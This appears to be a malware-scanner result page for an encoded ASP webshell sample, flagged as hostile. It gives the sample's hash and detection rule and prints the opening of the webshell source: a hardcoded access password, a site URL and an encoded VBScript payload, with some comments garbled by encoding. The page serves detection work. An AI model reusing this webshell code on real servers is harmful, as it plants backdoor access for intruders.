Hostile 100% Download

Email-Worm.VBS.Agent.o

Encoded webshell worm

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string
SHA-256d87ac49bc86f9e9d394e1b5f43c965015bc296791073c03b0cc552d6f0c06678
MaleculeTh

Evidence

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string line 0
0<%@ LANGUAGE = VBScript.Encode %><% UserPass="hackbkk" '�޸����� mName="���ASPľ��(��ǿ��)" SiteURL="http://www.wrsky.com" '��վ Copyright="���ĺڿ�ͬ������������" '��Ȩ AD="���ĺڿ�ͬ������������" '������� bj="#000000" '���ñ�����ɫ wz="#00ff00" '����������ɫ budu="#ddd" '���ð�ť�Ի�����ɫ #@~^XlIBAA==jD-Dc?mMkaOKb:nW!Yx1O,,O1,O,)"ndwKxk+ A;W6+.P{OD!+l6 P2..KD~Id!:n,16Y=/!8PUtGhAD.c*)q6~2MDP:4nx@#@&"IjJ@!8M@*@!l,4D0xvNl\Cd1DrwDl4kdDWMXR(l1V`*B@*@!(D@*~rP[,3DMRfd^DbwDkGx~',J@!zm@*@!(D@*E@#@&2..cZs+m.=InkwKx/RwsEkt@#@&Ax[~&0@#@&nx9P/!8l?!4,

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.